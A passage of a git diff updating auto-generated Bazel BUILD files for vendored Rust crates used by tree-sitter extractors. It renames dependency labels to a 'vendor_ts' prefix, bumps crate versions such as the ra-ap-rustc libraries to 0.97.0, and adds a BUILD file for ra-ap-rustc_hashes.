"@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:powerpc-unknown-linux-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:riscv32imc-unknown-none-elf": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:riscv64gc-unknown-none-elf": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:s390x-unknown-linux-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:thumbv7em-none-eabi": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:thumbv8m.main-none-eabi": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:wasm32-unknown-unknown": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:wasm32-wasip1": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:x86_64-apple-darwin": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:x86_64-apple-ios": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:x86_64-linux-android": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:x86_64-unknown-freebsd": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:x86_64-unknown-fuchsia": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:x86_64-unknown-linux-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:x86_64-unknown-none": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:x86_64-unknown-uefi": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "//conditions:default": [], }), diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.once_cell-1.20.2.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.once_cell-1.20.3.bazel similarity index 99% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.once_cell-1.20.2.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.once_cell-1.20.3.bazel index 03549cbfb504..5b194f587bb8 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.once_cell-1.20.2.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.once_cell-1.20.3.bazel @@ -85,5 +85,5 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "1.20.2", + version = "1.20.3", ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.os_str_bytes-7.0.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.os_str_bytes-7.0.0.bazel index afb6050d04e7..ea9024c51ced 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.os_str_bytes-7.0.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.os_str_bytes-7.0.0.bazel @@ -86,6 +86,6 @@ rust_library( }), version = "7.0.0", deps = [ - "@vendor__memchr-2.7.4//:memchr", + "@vendor_ts__memchr-2.7.4//:memchr", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.parking_lot-0.12.3.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.parking_lot-0.12.3.bazel index 93eb0e47dcc5..8dc49b684be5 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.parking_lot-0.12.3.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.parking_lot-0.12.3.bazel @@ -84,7 +84,7 @@ rust_library( }), version = "0.12.3", deps = [ - "@vendor__lock_api-0.4.12//:lock_api", - "@vendor__parking_lot_core-0.9.10//:parking_lot_core", + "@vendor_ts__lock_api-0.4.12//:lock_api", + "@vendor_ts__parking_lot_core-0.9.10//:parking_lot_core", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.parking_lot_core-0.9.10.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.parking_lot_core-0.9.10.bazel index 38b7fc7fc6f5..d53c706ee3cb 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.parking_lot_core-0.9.10.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.parking_lot_core-0.9.10.bazel @@ -82,90 +82,90 @@ rust_library( }), version = "0.9.10", deps = [ - "@vendor__cfg-if-1.0.0//:cfg_if", - "@vendor__parking_lot_core-0.9.10//:build_script_build", - "@vendor__smallvec-1.13.2//:smallvec", + "@vendor_ts__cfg-if-1.0.0//:cfg_if", + "@vendor_ts__parking_lot_core-0.9.10//:build_script_build", + "@vendor_ts__smallvec-1.14.0//:smallvec", ] + select({ "@rules_rust//rust/platform:aarch64-apple-darwin": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:aarch64-apple-ios": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:aarch64-apple-ios-sim": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:aarch64-linux-android": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [ - "@vendor__windows-targets-0.52.6//:windows_targets", # cfg(windows) + "@vendor_ts__windows-targets-0.52.6//:windows_targets", # cfg(windows) ], "@rules_rust//rust/platform:aarch64-unknown-fuchsia": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:aarch64-unknown-linux-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:aarch64-unknown-nixos-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:aarch64-unknown-nto-qnx710": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:arm-unknown-linux-gnueabi": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:armv7-linux-androideabi": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:i686-apple-darwin": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:i686-linux-android": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:i686-pc-windows-msvc": [ - "@vendor__windows-targets-0.52.6//:windows_targets", # cfg(windows) + "@vendor_ts__windows-targets-0.52.6//:windows_targets", # cfg(windows) ], "@rules_rust//rust/platform:i686-unknown-freebsd": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:i686-unknown-linux-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:powerpc-unknown-linux-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:s390x-unknown-linux-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:x86_64-apple-darwin": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:x86_64-apple-ios": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:x86_64-linux-android": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [ - "@vendor__windows-targets-0.52.6//:windows_targets", # cfg(windows) + "@vendor_ts__windows-targets-0.52.6//:windows_targets", # cfg(windows) ], "@rules_rust//rust/platform:x86_64-unknown-freebsd": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:x86_64-unknown-fuchsia": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:x86_64-unknown-linux-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "//conditions:default": [], }), diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.pear-0.2.9.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.pear-0.2.9.bazel index ec071cb5de34..72d8ec29384b 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.pear-0.2.9.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.pear-0.2.9.bazel @@ -36,7 +36,7 @@ rust_library( crate_root = "src/lib.rs", edition = "2018", proc_macro_deps = [ - "@vendor__pear_codegen-0.2.9//:pear_codegen", + "@vendor_ts__pear_codegen-0.2.9//:pear_codegen", ], rustc_flags = [ "--cap-lints=allow", @@ -89,7 +89,7 @@ rust_library( }), version = "0.2.9", deps = [ - "@vendor__inlinable_string-0.1.15//:inlinable_string", - "@vendor__yansi-1.0.1//:yansi", + "@vendor_ts__inlinable_string-0.1.15//:inlinable_string", + "@vendor_ts__yansi-1.0.1//:yansi", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.pear_codegen-0.2.9.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.pear_codegen-0.2.9.bazel index b7f577c7ca46..4ba44587033d 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.pear_codegen-0.2.9.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.pear_codegen-0.2.9.bazel @@ -81,9 +81,9 @@ rust_proc_macro( }), version = "0.2.9", deps = [ - "@vendor__proc-macro2-1.0.93//:proc_macro2", - "@vendor__proc-macro2-diagnostics-0.10.1//:proc_macro2_diagnostics", - "@vendor__quote-1.0.38//:quote", - "@vendor__syn-2.0.96//:syn", + "@vendor_ts__proc-macro2-1.0.93//:proc_macro2", + "@vendor_ts__proc-macro2-diagnostics-0.10.1//:proc_macro2_diagnostics", + "@vendor_ts__quote-1.0.38//:quote", + "@vendor_ts__syn-2.0.98//:syn", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.perf-event-0.4.7.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.perf-event-0.4.7.bazel index 1f6476ee6320..5784824a2985 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.perf-event-0.4.7.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.perf-event-0.4.7.bazel @@ -81,7 +81,7 @@ rust_library( }), version = "0.4.7", deps = [ - "@vendor__libc-0.2.169//:libc", - "@vendor__perf-event-open-sys-1.0.1//:perf_event_open_sys", + "@vendor_ts__libc-0.2.169//:libc", + "@vendor_ts__perf-event-open-sys-1.0.1//:perf_event_open_sys", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.perf-event-open-sys-1.0.1.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.perf-event-open-sys-1.0.1.bazel index bae5d7a89bfd..92b15bc5d885 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.perf-event-open-sys-1.0.1.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.perf-event-open-sys-1.0.1.bazel @@ -81,6 +81,6 @@ rust_library( }), version = "1.0.1", deps = [ - "@vendor__libc-0.2.169//:libc", + "@vendor_ts__libc-0.2.169//:libc", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.petgraph-0.6.5.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.petgraph-0.6.5.bazel index 44b02c9f9d4e..df987bd453e9 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.petgraph-0.6.5.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.petgraph-0.6.5.bazel @@ -87,7 +87,7 @@ rust_library( }), version = "0.6.5", deps = [ - "@vendor__fixedbitset-0.4.2//:fixedbitset", - "@vendor__indexmap-2.7.0//:indexmap", + "@vendor_ts__fixedbitset-0.4.2//:fixedbitset", + "@vendor_ts__indexmap-2.7.0//:indexmap", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ppv-lite86-0.2.20.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ppv-lite86-0.2.20.bazel index 7a21bfe9b505..37a6586979ac 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ppv-lite86-0.2.20.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ppv-lite86-0.2.20.bazel @@ -85,6 +85,6 @@ rust_library( }), version = "0.2.20", deps = [ - "@vendor__zerocopy-0.7.35//:zerocopy", + "@vendor_ts__zerocopy-0.7.35//:zerocopy", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.proc-macro2-1.0.93.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.proc-macro2-1.0.93.bazel index 17e69670194b..bcc9b7fe36af 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.proc-macro2-1.0.93.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.proc-macro2-1.0.93.bazel @@ -86,8 +86,8 @@ rust_library( }), version = "1.0.93", deps = [ - "@vendor__proc-macro2-1.0.93//:build_script_build", - "@vendor__unicode-ident-1.0.14//:unicode_ident", + "@vendor_ts__proc-macro2-1.0.93//:build_script_build", + "@vendor_ts__unicode-ident-1.0.16//:unicode_ident", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.proc-macro2-diagnostics-0.10.1.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.proc-macro2-diagnostics-0.10.1.bazel index 478e5671ace3..6e74bb3b8793 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.proc-macro2-diagnostics-0.10.1.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.proc-macro2-diagnostics-0.10.1.bazel @@ -87,11 +87,11 @@ rust_library( }), version = "0.10.1", deps = [ - "@vendor__proc-macro2-1.0.93//:proc_macro2", - "@vendor__proc-macro2-diagnostics-0.10.1//:build_script_build", - "@vendor__quote-1.0.38//:quote", - "@vendor__syn-2.0.96//:syn", - "@vendor__yansi-1.0.1//:yansi", + "@vendor_ts__proc-macro2-1.0.93//:proc_macro2", + "@vendor_ts__proc-macro2-diagnostics-0.10.1//:build_script_build", + "@vendor_ts__quote-1.0.38//:quote", + "@vendor_ts__syn-2.0.98//:syn", + "@vendor_ts__yansi-1.0.1//:yansi", ], ) @@ -148,7 +148,7 @@ cargo_build_script( version = "0.10.1", visibility = ["//visibility:private"], deps = [ - "@vendor__version_check-0.9.5//:version_check", + "@vendor_ts__version_check-0.9.5//:version_check", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.quote-1.0.38.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.quote-1.0.38.bazel index 6e2d08c844e6..1f85e8a04310 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.quote-1.0.38.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.quote-1.0.38.bazel @@ -85,6 +85,6 @@ rust_library( }), version = "1.0.38", deps = [ - "@vendor__proc-macro2-1.0.93//:proc_macro2", + "@vendor_ts__proc-macro2-1.0.93//:proc_macro2", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_abi-0.87.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_abi-0.97.0.bazel similarity index 88% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_abi-0.87.0.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_abi-0.97.0.bazel index 4eb18732fe05..742b9bee04b6 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_abi-0.87.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_abi-0.97.0.bazel @@ -17,7 +17,8 @@ rust_library( allow_empty = True, ), aliases = { - "@vendor__ra-ap-rustc_index-0.87.0//:ra_ap_rustc_index": "rustc_index", + "@vendor_ts__ra-ap-rustc_hashes-0.97.0//:ra_ap_rustc_hashes": "rustc_hashes", + "@vendor_ts__ra-ap-rustc_index-0.97.0//:ra_ap_rustc_index": "rustc_index", }, compile_data = glob( include = ["**"], @@ -32,7 +33,7 @@ rust_library( ], ), crate_root = "src/lib.rs", - edition = "2021", + edition = "2024", rustc_flags = [ "--cap-lints=allow", ], @@ -82,10 +83,11 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.87.0", + version = "0.97.0", deps = [ - "@vendor__bitflags-2.7.0//:bitflags", - "@vendor__ra-ap-rustc_index-0.87.0//:ra_ap_rustc_index", - "@vendor__tracing-0.1.41//:tracing", + "@vendor_ts__bitflags-2.8.0//:bitflags", + "@vendor_ts__ra-ap-rustc_hashes-0.97.0//:ra_ap_rustc_hashes", + "@vendor_ts__ra-ap-rustc_index-0.97.0//:ra_ap_rustc_index", + "@vendor_ts__tracing-0.1.41//:tracing", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_hashes-0.97.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_hashes-0.97.0.bazel new file mode 100644 index 000000000000..f44bed7781db --- /dev/null +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_hashes-0.97.0.bazel @@ -0,0 +1,86 @@ +############################################################################### +# @generated +# DO NOT MODIFY: This file is auto-generated by a crate_universe tool. To +# regenerate this file, run the following: +# +# bazel run @@//misc/bazel/3rdparty:vendor_tree_sitter_extractors +############################################################################### + +load("@rules_rust//rust:defs.bzl", "rust_library") + +package(default_visibility = ["//visibility:public"]) + +rust_library( + name = "ra_ap_rustc_hashes", + srcs = glob( + include = ["**/*.rs"], + allow_empty = True, + ), + compile_data = glob( + include = ["**"], + allow_empty = True, + exclude = [ + "**/* *", + ".tmp_git_root/**/*", + "BUILD", + "BUILD.bazel", + "WORKSPACE", + "WORKSPACE.bazel", + ], + ), + crate_root = "src/lib.rs", + edition = "2024", + rustc_flags = [ + "--cap-lints=allow", + ], + tags = [ + "cargo-bazel", + "crate-name=ra-ap-rustc_hashes", + "manual", + "noclippy", + "norustfmt", + ], + target_compatible_with = select({ + "@rules_rust//rust/platform:aarch64-apple-darwin": [], + "@rules_rust//rust/platform:aarch64-apple-ios": [], + "@rules_rust//rust/platform:aarch64-apple-ios-sim": [], + "@rules_rust//rust/platform:aarch64-linux-android": [], + "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [], + "@rules_rust//rust/platform:aarch64-unknown-fuchsia": [], + "@rules_rust//rust/platform:aarch64-unknown-linux-gnu": [], + "@rules_rust//rust/platform:aarch64-unknown-nixos-gnu": [], + "@rules_rust//rust/platform:aarch64-unknown-nto-qnx710": [], + "@rules_rust//rust/platform:aarch64-unknown-uefi": [], + "@rules_rust//rust/platform:arm-unknown-linux-gnueabi": [], + "@rules_rust//rust/platform:armv7-linux-androideabi": [], + "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi": [], + "@rules_rust//rust/platform:i686-apple-darwin": [], + "@rules_rust//rust/platform:i686-linux-android": [], + "@rules_rust//rust/platform:i686-pc-windows-msvc": [], + "@rules_rust//rust/platform:i686-unknown-freebsd": [], + "@rules_rust//rust/platform:i686-unknown-linux-gnu": [], + "@rules_rust//rust/platform:powerpc-unknown-linux-gnu": [], + "@rules_rust//rust/platform:riscv32imc-unknown-none-elf": [], + "@rules_rust//rust/platform:riscv64gc-unknown-none-elf": [], + "@rules_rust//rust/platform:s390x-unknown-linux-gnu": [], + "@rules_rust//rust/platform:thumbv7em-none-eabi": [], + "@rules_rust//rust/platform:thumbv8m.main-none-eabi": [], + "@rules_rust//rust/platform:wasm32-unknown-unknown": [], + "@rules_rust//rust/platform:wasm32-wasip1": [], + "@rules_rust//rust/platform:x86_64-apple-darwin": [], + "@rules_rust//rust/platform:x86_64-apple-ios": [], + "@rules_rust//rust/platform:x86_64-linux-android": [], + "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [], + "@rules_rust//rust/platform:x86_64-unknown-freebsd": [], + "@rules_rust//rust/platform:x86_64-unknown-fuchsia": [], + "@rules_rust//rust/platform:x86_64-unknown-linux-gnu": [], + "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu": [], + "@rules_rust//rust/platform:x86_64-unknown-none": [], + "@rules_rust//rust/platform:x86_64-unknown-uefi": [], + "//conditions:default": ["@platforms//:incompatible"], + }), + version = "0.97.0", + deps = [ + "@vendor_ts__rustc-stable-hash-0.1.1//:rustc_stable_hash", + ], +) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_index-0.87.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_index-0.97.0.bazel similarity index 92% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_index-0.87.0.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_index-0.97.0.bazel index db976fae9026..20f80a3542a4 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_index-0.87.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_index-0.97.0.bazel @@ -17,7 +17,7 @@ rust_library( allow_empty = True, ), aliases = { - "@vendor__ra-ap-rustc_index_macros-0.87.0//:ra_ap_rustc_index_macros": "rustc_index_macros", + "@vendor_ts__ra-ap-rustc_index_macros-0.97.0//:ra_ap_rustc_index_macros": "rustc_index_macros", }, compile_data = glob( include = ["**"], @@ -32,9 +32,9 @@ rust_library( ], ), crate_root = "src/lib.rs", - edition = "2021", + edition = "2024", proc_macro_deps = [ - "@vendor__ra-ap-rustc_index_macros-0.87.0//:ra_ap_rustc_index_macros", + "@vendor_ts__ra-ap-rustc_index_macros-0.97.0//:ra_ap_rustc_index_macros", ], rustc_flags = [ "--cap-lints=allow", @@ -85,8 +85,8 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.87.0", + version = "0.97.0", deps = [ - "@vendor__smallvec-1.13.2//:smallvec", + "@vendor_ts__smallvec-1.14.0//:smallvec", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_index_macros-0.87.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_index_macros-0.97.0.bazel similarity index 95% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_index_macros-0.87.0.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_index_macros-0.97.0.bazel index ec5390efd1d0..eca0772470cf 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_index_macros-0.87.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_index_macros-0.97.0.bazel @@ -29,7 +29,7 @@ rust_proc_macro( ], ), crate_root = "src/lib.rs", - edition = "2021", + edition = "2024", rustc_flags = [ "--cap-lints=allow", ], @@ -79,10 +79,10 @@ rust_proc_macro( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.87.0", + version = "0.97.0", deps = [ - "@vendor__proc-macro2-1.0.93//:proc_macro2", - "@vendor__quote-1.0.38//:quote", - "@vendor__syn-2.0.96//:syn", + "@vendor_ts__proc-macro2-1.0.93//:proc_macro2", + "@vendor_ts__quote-1.0.38//:quote", + "@vendor_ts__syn-2.0.98//:syn", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_lexer-0.87.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_lexer-0.97.0.bazel similarity index 94% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_lexer-0.87.0.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_lexer-0.97.0.bazel index e6f63b6889ee..58c662ab8d39 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_lexer-0.87.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_lexer-0.97.0.bazel @@ -29,7 +29,7 @@ rust_library( ], ), crate_root = "src/lib.rs", - edition = "2021", + edition = "2024", rustc_flags = [ "--cap-lints=allow", ], @@ -79,9 +79,10 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.87.0", + version = "0.97.0", deps = [ - "@vendor__unicode-properties-0.1.3//:unicode_properties", - "@vendor__unicode-xid-0.2.6//:unicode_xid", + "@vendor_ts__memchr-2.7.4//:memchr", + "@vendor_ts__unicode-properties-0.1.3//:unicode_properties", + "@vendor_ts__unicode-xid-0.2.6//:unicode_xid", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_parse_format-0.87.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_parse_format-0.97.0.bazel similarity index 91% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_parse_format-0.87.0.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_parse_format-0.97.0.bazel index eff127696b17..38ac1f7eab54 100644 --- 